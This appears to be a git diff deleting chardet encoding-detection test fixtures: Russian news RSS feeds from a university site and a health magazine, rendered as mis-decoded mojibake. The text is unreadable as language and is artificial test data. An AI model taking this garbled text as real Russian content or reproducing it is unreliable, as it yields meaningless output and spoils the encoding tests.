־ֱױ־ ׃ֿװׂױִ־ֹֻ חֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֹֽׂװֱײֱ, ֳִֵֿ־װ ֱִֵֶֻׂ ֱׂױֲֵײ־ַֿֿ ֹ׃ֻױ׃׃װ׳ֱ ףֱ־ֻװ-נֵװֲֵׂױַׂ׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֱֱִֵֵֹֻֽ׃ַֻֿֿ ֹ־׃װֹװױװֱ ײֹ׳ֿ׀ֹ׃ֹ, ׃ֻױּ״׀װױׂ ֹ ֱָֹׂװֵֻװױׂ ֹֽ. י.ו.עֵ׀ֹ־ֱ לְֱִֹּֽ י׳ֱ־ֿ׳־ֱ הֱ׳ִֿ׳ֱ. - -נְֱֱַֹּׂװ׃ׁ ׃װױִֵ־װ ֹ ׃ֿװׂױִ־ֹֹֻ ױ־ֹ׳ֵׂ׃ֹװֵװֱ. קִָֿ ׃׳ֲִֿֿ־. - -מֱֱּֿ ׳ 14.00 -http://susu.ac.ru/ru/news/1331 - - -Wed, 28 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1328 -כֱֽֿ־ֱִ אץׂחץ ַֿװֿ׳ֹװ׃ׁ ֻ ֶֹ־ֱּױ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׀ֿ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ְֹ -כֱֽֿ־ֱִ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ, ֱ׳ֵֿ׳ֱ׳ֱׁ ׀ױװֵ׳ֻױ ׳ ֶֹ־ֱּ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׀ֿ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ְֹ (9–13 ֱ׀ֵּׁׂ 2006 ֱִַֿ, ףֱ־ ב־װֿ־ֹֿ, פֱֵָ׃, ףב), ׀ֱֵַֹּׂ־ֱ ־ֱ װֵׂ־ֹֿׂ׳ֿ־ֵ ׃ֲֿׂ ִּׁ ׀ִַֿֿװֿ׳ֹֻ ֱֻֽֿ־ִ-ֱֽ׃װֵֿׂ׳ (28 ׁ־׳ֱׁׂ-6 ֵֶ׳ֱּׁׂ,... -כֱֽֿ־ֱִ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ, ֱ׳ֵֿ׳ֱ׳ֱׁ ׀ױװֵ׳ֻױ ׳ ֶֹ־ֱּ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׀ֿ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ְֹ (9–13 ֱ׀ֵּׁׂ 2006 ֱִַֿ, ףֱ־ ב־װֿ־ֹֿ, פֱֵָ׃, ףב), ׀ֱֵַֹּׂ־ֱ ־ֱ װֵׂ־ֹֿׂ׳ֿ־ֵ ׃ֲֿׂ ִּׁ ׀ִַֿֿװֿ׳ֹֻ ֱֻֽֿ־ִ-ֱֽ׃װֵֿׂ׳ (28 ׁ־׳ֱׁׂ-6 ֵֶ׳ֱּׁׂ, נֵװֱֿׂ׳ִֿ׃ֻ, עֿ׃׃ֹׁ). - -ק ׃ֿ׃װֱ׳ ֱֻֽֿ־ִ ׳ִָֿׁװ: קֹװֱֹּ גֲֵֻּּֿֿ״׃ֹֻ (םם-552), ףֵֵַׂ םֱִײױֱַ (םם-552), קֵׁ׃ֱּ׳ עֱֽֿ־ֿ׳ (ֱ׃׀ֱֹׂ־װ). פֵׂ־ֵׂ – ֳִֵֿ־װ ֱִֵֶֻׂ נעיםב ב־ִֵׂ כֿ־׃װֱ־װֹ־ֿ׳ֹ הִֵֹֽֿ׳. -http://susu.ac.ru/ru/news/1328 - - -Tue, 27 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1327 -פֵָ־ֵַֹּֿֿ׃ֹֻ ִֵֻּּֿײ ׃ֵׂ׳ֹ׃ֱ אץׂחץ ׀ֱִׂ־ױֵװ — 30-ֵּװֵֹ! -28 ֱֲִֵֻׁׂ פֵָ־ֵַֹּֿֿ׃ֹֻ ִֵֻּּֿײ ׃ֵׂ׳ֹ׃ֱ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ (‏ֲֵֹּׁ־׃ֻ, ױּ. בׂװֵֹֹּּׂ׃ֱֻׁ, 100) — ׀ֱִׂ־ױֵװ 30-ֵּװֵֹ. - -כִֵּּֿײ — ִֿ־ֿ ֹ ׳ִֵױָֹ ׃ִֵׂ־ָֹ ױֲֵ־ָ ֱ׳ִֵֵ־ֹ ‏ֲֵֹּׁ־׃ֻֿ ֱֲּֿ׃װֹ, ַֿװֿ׳ֹװ ׃׀ֱֳֵֹֹּ׃װֿ׳ ׃ֵֶׂ... -28 ֱֲִֵֻׁׂ פֵָ־ֵַֹּֿֿ׃ֹֻ ִֵֻּּֿײ ׃ֵׂ׳ֹ׃ֱ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ (‏ֲֵֹּׁ־׃ֻ, ױּ. בׂװֵֹֹּּׂ׃ֱֻׁ, 100) — ׀ֱִׂ־ױֵװ 30-ֵּװֵֹ. - -כִֵּּֿײ — ִֿ־ֿ ֹ ׳ִֵױָֹ ׃ִֵׂ־ָֹ ױֲֵ־ָ ֱ׳ִֵֵ־ֹ ‏ֲֵֹּׁ־׃ֻֿ ֱֲּֿ׃װֹ, ַֿװֿ׳ֹװ ׃׀ֱֳֵֹֹּ׃װֿ׳ ׃ֵֶׂ ֲֿ׃ּױײֹ׳ֱ־ֹׁ: ׀ֿׂװ־ָ, ֱֹֻֻֿֿׂ׳, ִֵּֽֿ״ֵֿׂ׳-ֻֿ־׃װׂױֻװֿֿׂ׳, ׀ֱֱֵָֹֻֽֿׂׂ׳ ֹ ֵֽ־ִֵײֵֿׂ׳. - -ק ֱֱָֻֽׂ ְֲֵֹּׁ ׃ֿ׃װֹֿװ׃ׁ װֿׂײֵ׃װ׳ֵ־־ֵֿ ׃ֱֲֿׂ־ֵֹ, ֱֻׁׁׂ ׀ֵֵׂ־װֱֳֹׁ ֳֵֹֻֻּּֿ ִֵֿײִ ֹ ׀ֵֹׂ׃ֻֿ. - -חֿ׃װֹֽׁ ֳֵֵֽֿׂ־ֹֹ ׃װֱ־ױװ ׀ִֵׂ׃װֱ׳ֹװֵֹּ ֹֽ־ֹ׃װֵׂ׃װ׳ֱ ֱֲֿֿׂ׳ֱ־ֹׁ ֱֲּֿ׃װֹ, ֵֻׂװֱֿׂװֱ אץׂחץ. - -ףִֵַֿ־ׁ, פֵָ־ֵַֹּֿֿ׃ֹֻ ִֵֻּּֿײ – זֱִֵֵּׂ״־ֱׁ ֻ׃׀ֵֵֹֽׂ־װֱּ״־ֱׁ ׀ֱֱִֻּֿ, ֱ׳װֿׂ׃ֱֻׁ ֱֻּֿ ֹ ֹ־־ֿ׳ֱֳֹֿ־־ ֳֵ־װׂ ׀ִַֿֿװֿ׳ֹֻ ׀ֱִֵַַֿֿ׳. - -ק װֽֿ ִַֿױ ױֲֵ־ֵֿ ֱ׳ִֵֵ־ֵֹ ־ֱֱַׂײִֵ־ֿ ִֹ׀ּֽֽֿֿ «ת־ֱֻ ֱֵֻ׃װ׳ֱ ֱֲֿֿׂ׳ֱ־ֹׁ» חֿ׃ױֱִׂ׃װ׳ֵ־־ֿ הױֽ, עֿ׃׃ֹ׃ֻֿ ֱֱִֵֹֹֻֽ ֱֲֿֿׂ׳ֱ־ֹׁ ֹ ֹֽ־ֹ׃װֵׂ׃װ׳ֱ ֱֲֿֿׂ׳ֱ־ֹׁ עז. - -הֵֹֻׂװֿׂ ִֵֻּּֿײֱ, חֱֹּ־ֱ ףװֵ׀ֱ־ֿ׳־ֱ כֿ׃װֻֿ – ׀ֹׂ־ֱ־ֱ ּױֵ ײֵ־ֹ־ֿ – ׂױֻֿ׳ִֹֿװֵֵּֽ ׃ֵֶׂ ֱֲֿֿׂ׳ֱ־ֹׁ 2005 ֱִַֿ. - -מֱֱּֿ ׳ 14.00 - -הֿ׀ּֿ־ֹװֵּ״־ֱׁ ֹ־ֱֳֶֹֽֿׁׂ ׀ֿ װֵֵֶּֿ־ױ: 772-77-64. -http://susu.ac.ru/ru/news/1327 - - -Mon, 26 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1326 -אץׂחץ ֿװ׀ֱׂ׳ֵּׁװ׃ׁ ׳ «מֿ׳ִַֿֿ־ֵֵ ׀ױװֵֵ׃װ׳ֵֹ» -27 ֱֲִֵֻׁׂ אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ֱִׂ־ױֵװ מֿ׳ ִַֿ! - -ק «מֿ׳ִַֿֿ־ֵֵ ׀ױװֵֵ׃װ׳ֵֹ» ׀ֿ ׃װױִֵ־ֵ׃ֻֽֿױ ִַֻֿֿׂױ ֿװ׀ֱׂ׳ֹװ׃ׁ ־ֱ׃װֱֿׁׁ ׂױ׃׃ֱֻׁ װֱֻֿׂ. - -הִֵ םֿֿׂ ֹ ף־ֵַױֱֻֿׂ ׀ֱִֿׂ׳ׁװ ׃װױִֵ־װֿ׳ ֹ ׀ֵׂ׀ֱִֿ׳ֱװֵֵּ, ׀ֿׂ׳ִֵױװ ׳ֵ׃ֵֵּ ֻֿ־ֻױׂ׃,... -27 ֱֲִֵֻׁׂ אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ֱִׂ־ױֵװ מֿ׳ ִַֿ! - -ק «מֿ׳ִַֿֿ־ֵֵ ׀ױװֵֵ׃װ׳ֵֹ» ׀ֿ ׃װױִֵ־ֵ׃ֻֽֿױ ִַֻֿֿׂױ ֿװ׀ֱׂ׳ֹװ׃ׁ ־ֱ׃װֱֿׁׁ ׂױ׃׃ֱֻׁ װֱֻֿׂ. - -הִֵ םֿֿׂ ֹ ף־ֵַױֱֻֿׂ ׀ֱִֿׂ׳ׁװ ׃װױִֵ־װֿ׳ ֹ ׀ֵׂ׀ֱִֿ׳ֱװֵֵּ, ׀ֿׂ׳ִֵױװ ׳ֵ׃ֵֵּ ֻֿ־ֻױׂ׃, ׀ֱִֿׂױְװ ׀ֱֱִֹֻֽֿׂ. - -נִּֿֿׂײֹװ׃ׁ ׀ֱִׂ־ֹֻ ׳ ֵֶֿ ׳װַֿֿֿׂ װֱײֱ ֱַּ׳־ַֿֿ ֻֿׂ׀ױ׃ֱ ׳ױֱ ױ ֱֻׂ׃ֱ׳ֳֹ-£ֹֻּ. - -חֿ׃װֵ ׀ֱִׂ־ֱֹֻ ײִױװ ׃ָֹֻֽֿֿֿׂ, ׀ׂײֹֻ ׳ ֱֵָֻֽ, ֱױֳֹֻֿ־ ־ֿ׳ִַֿֿ־ָֹ ׀ֵ׃ֵ־, ֻֿ־ֻױׂ׃ ׀ֿ׃ּֿ׳ֳֹ, װֱ־ֳֵ׳ ֹ ־ֿ׳ִַֿֿ־ָֹ ׃װָֹֿ׳. - -תִֵ׃״ ײֵ ױֽ־ֿ ֱׂ׳ֵׂ־£װ׃ׁ ֱֱֻֽׁׂׂ ־ֿ׳ִַֿֿ־ָֹ ׃ױ׳ֵ־ֹֿׂ׳. - -נֿ ׃ּֿ׳ֱֽ ֱַּ׳־ַֿֿ ֱַֿׂ־ֱֹװֱֿׂ, ׳ִָֿ־ֿ׳ֹװֵּׁ ׀ֱִׂ־ֱֹֻ ֹ ׀ֿׂ׃װֿ ֵַָֿֿֿׂ ֵּֿ׳ֱֵֻ — הֱִֵ םֱֿֿׂ, מֿ׳ ִַֿ ֲױִֵװ ֲִֿֿׂ ׃ֱֻֻֿ, ֹ׃׀ּֿ־ׁװ׃ׁ ׳׃ֵ ֵֽװ, ֱ ׀ֱִֻֿֿׂ׳ ֱֲֿׁװֵּ״־ֿ ָ׳ֱװֹװ ׳׃ֵֽ ׃װױִֵ־װֱֽ, ׀ֵׂ׀ֱִֿ׳ֱװֵּֽׁ ֹ ֻֿ־ֵ־ֿ ֱ׃׀ֱֹׂ־װֱֽ ֻׂױ׀־ֵֵַֿ ׳ױֱ עֿ׃׃ֹֹ! - -מֱֱּֿ ׀ױװֵֵ׃װ׳ֹׁ ׳ 12:00. -http://susu.ac.ru/ru/news/1326 - - -Mon, 26 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1325 -ףֵֹֽ־ֱׂ «נֱֱֵּּּׂ״־ֵ ׳ֹ׃ֹּװֵּ״־ֵ װֵָ־ַֹֹּֿֿ» -26 ׁ־׳ֱׁׂ אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ֿׂ׳ִֹֿװ ִֿ־ִֿ־ֵ׳־ ־ֱױ־ֿ-׀ֱֻׂװֵֹ׃ֹֻ ׃ֵֹֽ־ֱׂ «נֱֱֵּּּׂ״־ֵ ׳ֹ׃ֹּװֵּ״־ֵ װֵָ־ַֹֹּֿֿ». - -ףֵֹֽ־ֱׂ ׀ֿ׃׳ֵׁ־ ֿ׃־ֿ׳־ֽ ־ֱ׀ֱׂ׳ֵּ־ֹֽׁ ֹ װֵ־ִֵ־ֳֹֽׁ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ׀ֱֱֵּּּׂ״־ָ ׳ֹ׃ֹּװֵּ״־ָ װֵָ־ַֹּֿֿ... -26 ׁ־׳ֱׁׂ אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ֿׂ׳ִֹֿװ ִֿ־ִֿ־ֵ׳־ ־ֱױ־ֿ-׀ֱֻׂװֵֹ׃ֹֻ ׃ֵֹֽ־ֱׂ «נֱֱֵּּּׂ״־ֵ ׳ֹ׃ֹּװֵּ״־ֵ װֵָ־ַֹֹּֿֿ». - -ףֵֹֽ־ֱׂ ׀ֿ׃׳ֵׁ־ ֿ׃־ֿ׳־ֽ ־ֱ׀ֱׂ׳ֵּ־ֹֽׁ ֹ װֵ־ִֵ־ֳֹֽׁ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ׀ֱֱֵּּּׂ״־ָ ׳ֹ׃ֹּװֵּ״־ָ װֵָ־ַֹּֿֿ ׳ ־ֱױ־ָ ֹ׃׃ִֵּֿ׳ֱ־ָֹׁ ֹ ֿ׀װ־ֿ-ֻֿ־׃װׂױֻװֿׂ׃ָֹֻ ֱֲֿׂװֱָ. - -<a href=""http://computer.susu.ru/PaVT/2006/"">הֵװֱּ״־ױְ ֹ־ְֱֳֶֹֽֿׂ ֽֿײ־ֿ ׀ּֿױֹװ״ ־ֱ web-׃ֱװֵ ׃ֵֹֽ־ֱֱׂ.</a> -http://susu.ac.ru/ru/news/1325 - - -Mon, 26 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1324 -נֱֱַֽֽֿׂׂ ׀ִִֵֿׂײֹֻ ־ֱױ־ָ ֹ׃׃ִֵּֿ׳ֱ־ֹ ִָּֽֿֿ ױֵ־ָ אץׂחץ -נֱֱַֽֽֿׂׂ ֳֵֵּ׳ֿ ׀ִִֵֿׂײֹֻ ־ֱױ־ָ ֹ׃׃ִֵּֿ׳ֱ־ֹ, ׀ֿׂ׳ִָֹֽֿ ִֹּֽֽֿֿ ױֵ־ֹֽ ׳ אײ־ֿ-ץֱּׂ״׃ֻֽֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֽֿ ױ־ֹ׳ֵׂ׃ֹװֵװֵ. -<a href=""/file/uprav.doc"">נֱֱַֽֽֿׂׂ ֳֵֵּ׳ֿ ׀ִִֵֿׂײֹֻ ־ֱױ־ָ ֹ׃׃ִֵּֿ׳ֱ־ֹ</a>, ׀ֿׂ׳ִָֹֽֿ ִֹּֽֽֿֿ ױֵ־ֹֽ ׳ אײ־ֿ-ץֱּׂ״׃ֻֽֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֽֿ ױ־ֹ׳ֵׂ׃ֹװֵװֵ. -http://susu.ac.ru/ru/news/1324 - - -Thu, 22 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1323 -כֱֱִֵֶׂ װֵָ־ַֹּֿֿ ֹ ׀ֵֻֿׂװֹֿׂ׳ֱ־ֹׁ ִֵֹֹּ ּ£ַֻֿ ׀ֵּֽֿׂ־־ֿ׃װֹ ֿװֱֻּׂ ׃ֱװ -כֱֱִֵֶׂ װֵָ־ַֹּֿֿ ֹ ׀ֵֻֿׂװֹֿׂ׳ֱ־ֹׁ ִֵֹֹּ ּ£ַֻֿ ׀ֵּֽֿׂ־־ֿ׃װֹ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ ֿװֱֻּׂ ׃ֲֿ׃װ׳ֵ־־ ׃ֱװ: http://www.tipilp.susu.ac.ru/ - -מֱ ׃ֱװֵ ׳ ֽֿײֵװֵ ־ֱװֹ: ֹ־ְֱֳֶֹֽֿׂ ֿװ ֱִֵֵֶֻׂ, ־ֿ׳ֿ׃װֹ, ֵֻּװֿׂ־־ױְ ֲֲֹֹּֿװֵֻױ,... -<a href=""/ru/dept/tipilp"">כֱֱִֵֶׂ װֵָ־ַֹּֿֿ ֹ ׀ֵֻֿׂװֹֿׂ׳ֱ־ֹׁ ִֵֹֹּ ּ£ַֻֿ ׀ֵּֽֿׂ־־ֿ׃װֹ</a> אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ ֿװֱֻּׂ ׃ֲֿ׃װ׳ֵ־־ ׃ֱװ: <a href=""http://www.tipilp.susu.ac.ru/"">http://www.tipilp.susu.ac.ru/</a> - -מֱ ׃ֱװֵ ׳ ֽֿײֵװֵ ־ֱװֹ: ֹ־ְֱֳֶֹֽֿׂ ֿװ ֱִֵֵֶֻׂ, ־ֿ׳ֿ׃װֹ, ֵֻּװֿׂ־־ױְ ֲֲֹֹּֿװֵֻױ, ױ׃ּֿ׳ֹׁ ׀ֿ׃װױ׀ֵּ־ֹׁ ֹ ֽ־ֵַֿֿ ִׂױֵַֿ. -http://susu.ac.ru/ru/news/1323 - - -Thu, 22 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1322 -ף ה־£ֽ ־ֵֵַׂװֱֹֻ! -־ֵַֹׁׂ ׃ֻׂ׳ֱֵװ׃ׁ ׳ֿ ׳׃ֵֽ, -י װּֿ״ֻֿ ׃ ־ֵ ־ֱ ׃׳ֵװֵ ֽ ײֹ׳ֵֽ. -ם ׀ֱִֿׂ׳ֵּֽׁ, ֹ ׃ּֿ׳ֱ ֹ׃װ, -לְִֵ, ֻֿװֵֿׂ ׃ ־ֵֵַֹׂ ־ֱ װ. -ם ֱֱֲִַּֿׂ־ ֲױִֵֽ ֹֽ ֱ װֿ, -‏װֿ ׳ ־ֱֵֽ ִֵֽֿ ׃ױָֿ ֹ ׃׳ֵװּֿ, -‏װֿ ־ֵ ֲֹֽֿ׃ׁ ֽ ֽֿֿׂ־ָ ֹֽ, -ףױֿׂ׳ָ ֲױׂ״ ֹ ִֵּׁ־ָ ֱּ׳ֹ־. -־ֵַֹׁׂ ׃ֻׂ׳ֱֵװ׃ׁ ׳ֿ ׳׃ֵֽ, -י װּֿ״ֻֿ ׃ ־ֵ ־ֱ ׃׳ֵװֵ ֽ ײֹ׳ֵֽ. -ם ׀ֱִֿׂ׳ֵּֽׁ, ֹ ׃ּֿ׳ֱ ֹ׃װ, -לְִֵ, ֻֿװֵֿׂ ׃ ־ֵֵַֹׂ ־ֱ װ. -ם ֱֱֲִַּֿׂ־ ֲױִֵֽ ֹֽ ֱ װֿ, -‏װֿ ׳ ־ֱֵֽ ִֵֽֿ ׃ױָֿ ֹ ׃׳ֵװּֿ, -‏װֿ ־ֵ ֲֹֽֿ׃ׁ ֽ ֽֿֿׂ־ָ ֹֽ, -ףױֿׂ׳ָ ֲױׂ״ ֹ ִֵּׁ־ָ ֱּ׳ֹ־. -http://susu.ac.ru/ru/news/1322 - - -Wed, 21 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1321 -עֵֻװֿׂ אץׂחץ ֲֿׁ׳ֹװ ׃װױִֵ־װֱֽ ֱֱֲִַּֿׂ־ֿ׃װ״ -22 ֱֲִֵֻׁׂ ׳ ֱֵּ ֱ׃ֱִֵ־ֹ ױ£־ַֿֿ ׃ֿ׳ֵװֱ (ֱַּ׳־ ֻֿׂ׀ױ׃, 10 װֱײ) אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ ׃ֿ׃װֹֿװ׃ׁ װֱֳִֹֹֿׂ־־ֱׁ ֳֵֵֽֿׂ־ֹׁ ׳ׂױֵ־ֹׁ ֱֱֲִַּֿׂ־ֿ׃װֵ ֵֻׂװֱֿׂ ׳ױֱ. - -ןװְֻֿׂװ ֳֵֵֽֿׂ־ְֹ: ֵֻׂװֿׂ בֵֻּ׃ֱ־ִׂ לֵֿ־ִֹֿ׳ֹ ֵ׃װֱֻֿ׳ ֹ ׀ִֵׂ׃ֱִֵװֵּ״... -22 ֱֲִֵֻׁׂ ׳ ֱֵּ ֱ׃ֱִֵ־ֹ ױ£־ַֿֿ ׃ֿ׳ֵװֱ (ֱַּ׳־ ֻֿׂ׀ױ׃, 10 װֱײ) אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ ׃ֿ׃װֹֿװ׃ׁ װֱֳִֹֹֿׂ־־ֱׁ ֳֵֵֽֿׂ־ֹׁ ׳ׂױֵ־ֹׁ ֱֱֲִַּֿׂ־ֿ׃װֵ ֵֻׂװֱֿׂ ׳ױֱ. - -ןװְֻֿׂװ ֳֵֵֽֿׂ־ְֹ: ֵֻׂװֿׂ <a href=""/ru/person/alsh"">בֵֻּ׃ֱ־ִׂ לֵֿ־ִֹֿ׳ֹ ֵ׃װֱֻֿ׳</a> ֹ ׀ִֵׂ׃ֱִֵװֵּ״ ׀ֱֶֻֽֿֿׂ ׃װױִֵ־װֿ׳ ֹ ֱ׃׀ֱֹׂ־װֿ׳ אץׂחץ <a href=""/ru/person/schmidt"">ב־ִֵׂ קֱִֹֹּֽֿׂ׳ֹ ִֹֽװ</a>. - -גֱֱִַּֿׂ־ֿ׃װ״ ֹ ׀ְֵֹֽׂ ֵֻׂװֱֿׂ ׀ּֿױֱװ ֻּֿֿֿ 100 ׃װױִֵ־װֿ׳ ֹ ֱ׃׀ֱֹׂ־װֿ׳. - -נֿ ׃ּֿ׳ֱֽ ׀ִֵׂ׃ֱִֵװֵּׁ ׃װױִֵ־ֵ׃ַֻֿֿ ׀ֱֶֻֽֿֿׂ אץׂחץ ב־ִֵׁׂ קֱִֹֹּֽֿׂ׳ֱֹ ִֹֽװֱ, ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ִֿ׳ִֵֵװ ֹװַֹֿ ױִֵַָֿֿׁ ֱִַֿ ֹ ֿװֵֽװֹװ ׃װױִֵ־װֿ׳ ׀ֹׂ־ֱֹֽ׳ָֹ ֱֻװֹ׳־ֵֿ ױֱ׃װֵֹ ׳ ֲֵֿ׃װ׳ֵ־־ֿ ײֹ־ֹ ױ־ֹ׳ֵׂ׃ֹװֵװֱ, ּױָֹ ׃׀ֿׂװ׃ֵֽ־ֿ׳ ֹ ֱֻֽֿ־ִֹֿׂ׳ ׃װױִֵ־ֵ׃ָֹֻ װׂױִֿ׳ָ ֿװִֿׁׂ׳. - -מֱֱּֿ ׳ 13.00. -http://susu.ac.ru/ru/news/1321 - - \ No newline at end of file diff --git a/chardet/tests/MacCyrillic/aif.ru.health.xml b/chardet/tests/MacCyrillic/aif.ru.health.xml deleted file mode 100644 index 7fe7213..0000000 --- a/chardet/tests/MacCyrillic/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - ˆםעונםוע-גונסט טחהאםט "€ט” ‡המנמגו" - http://www.aif.ru/online/health - - - €ט” ‡המנמגו - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - - אך ןונוזטע םמגמדמהם‏‏ םמק - http://www.aif.ru/online/health/592/11_01 - - אגונםמו, והטםסעגוםםמו, גמ קעמ סודמהם למזםמ גונטע בוחמדמגמנמקםמ, עאך ‎עמ ג עמ, קעמ מגי דמה מבחאעוכםמ םאסעףןטע. וסלמענ םט םא קעמ! עמ םו ןנמסעמ מקונוהםמי ןנאחהםטך, ‎עמ - גוץא! € גוץט ג זטחםט ןנטםעמ מעלוקאע. עלוקאע רטנמךמ ט הוםךא ‎האך הגא-ענט... ˆ גלוסעמ ןנמגמחדכאראולץ "םמגמדמ סקאסע" ט "םמגמדמ חהמנמג" ןנאחהםמגאםטו מגמדמ דמהא ןנטםמסטע כטבמ םמגו במכקךט, כטבמ מבמסענוע סעאנו. „אב ןמסעאנאעס טחבוזאע ןמהמבםמדמ פטםאכא כ‏בטלמדמ ןנאחהםטךא, ןנטגוהף םוסךמכךמ "ןנאחהםטקםץ" ןנאגטכ חאסעמכםמי בוחמןאסםמסעט. - - - ˆהטעו ג באם‏! - http://www.aif.ru/online/health/592/03_01 - - עמ למזםמ הוכאע ג מןטכךאץ, ג לורךו ס בונוחמגלט כטסעלט טכט סוםמל. אנטעס למזםמ, האזו חאנגרטס ג ןוסמך. אך ןנאגטכםמ ץמהטע ג באם‏, םאל נאססךאחגאוע גנאק-פטחטמעונאןוגע מעהוכוםט באכםומכמדטט לוהטצטםסךמדמ צוםענא "ƒףעא-כטםטך" כט €’€‚€. - - - קול נאססךאזוע נואךצט לאםעף - http://www.aif.ru/online/health/592/05_01 - - ואךצט אםעף - ‎עמ עףבונךףכטםמגא ןנמבא. „כ ךאךמי צוכט מםא טחםאקאכםמ ןנוהםאחםאקאכאס? "ואךצט אםעף - ‎עמ מעגוע ךכועמקםמדמ טללףםטעועא ךאך דטןונקףגסעגטעוכםמסעט חאלוהכוםםמדמ עטןא םא סוםסטבטכטחאצט‏ מנדאםטחלא לטךמבאךעונטלט עףבונךףכוחא. נוהםאחםאקוםא מםא הכ גגכוםט ג מנדאםטחלו גמחבףהטעוכ עףבונךףכוחא". (מלטעוע ןמ ךכועמקםמלף טללףםטעועף ט ףסעמיקטגמסעט ך טםפוךצטט, ‚‡, 1965, 1970 דד.) ונגא גסענוקא ס לטךמבאךעונטלט עףבונךףכוחא ג מססטט םאגחגאועס טסךףססעגוםםמ (!) ט לאססמגמ ג נמההמלאץ. - - - ‘ 3 המ 7 כוע. אסעטל רוגוכ‏נף - http://www.aif.ru/online/health/592/06_01 - - "מוי הוגמקךו סךמנמ 5 כוע. …י ףזו באםעטךט םמסטע ץמקועס, םמ ץגמסעטךט הוכאע םו טח קודמ. מהסךאזטעו, ג קול למזוע בע ןנטקטםא ט ךאךטו סנוהסעגא למדףע ןמלמק?" -. ו ק ם ט ך מ ג א, מסענמלא - - - ‘ 7 המ 12 כוע. •מכמהטכםטך םא ךכ‏ק - http://www.aif.ru/online/health/592/06_02 - - "מזםמ כט מןנוהוכטע, טסעטםםמו ף נובוםךא מזטנוםטו טכט מם ןונווהאוע?" -’. € ג ו נ ט ם א, …ךאעונטםבףנד - - - ‘ 12 המ 16 כוע. ןאסםא למהא - http://www.aif.ru/online/health/592/06_03 - - "‘ךאזטעו, םאסךמכךמ מןאסםמ ץמהטע חטלמי ס מעךנעל זטגמעמל. מ המק דמגמנטע, קעמ מםא גסו ןנטךנגאוע ךףנעךמי, םמ גסו נאגםמ זו ץמכמהםמ... „מךאחאע וי קעמ-כטבמ םוגמחלמזםמ." -‚. ., ’מכעעט - - - נאגטכא הכ זוכףהךא - http://www.aif.ru/online/health/592/07_01 - - םמדטו ןונטמהטקוסךט סענאהא‏ע מע םוסגאנוםט זוכףהךא, סמןנמגמזהא‏שודמס במכוגלט משףשוםטלט. נטקטםא ‎עמדמ חאךכ‏קאועס םו עמכךמ ג עמל, קעמ כ‏הט והע םו עמ, קעמ םאהמ, םמ ט םו עאך, ךאך םאהמ, ט במכרו, קול םאהמ. סמבוםםמ קאסעמ עאךא ןנמבכולא גמחםטךאוע ןמסכו ןנאחהםטקםץ חאסעמכטי. —עמב םו המגמהטע זוכףהמך המ עאךמדמ סמסעמםט, ןמלםטעו םוסךמכךמ ןנמגונוםםץ גנולוםול ןנאגטכ. - - - אסעףןכוםטו םא אםדטםף - http://www.aif.ru/online/health/592/08_01 - - מהםמלף טח םאטבמכוו נאסןנמסענאםוםםץ ןנמסעףהםץ חאבמכוגאםטי מעםמסטעס אםדטםא, טכט מסעני עמםחטככטע. עמלף מסענמלף טםפוךצטמםםמלף חאבמכוגאםט‏ ס ןמנאזוםטול לטםהאכטם (דכאםה) 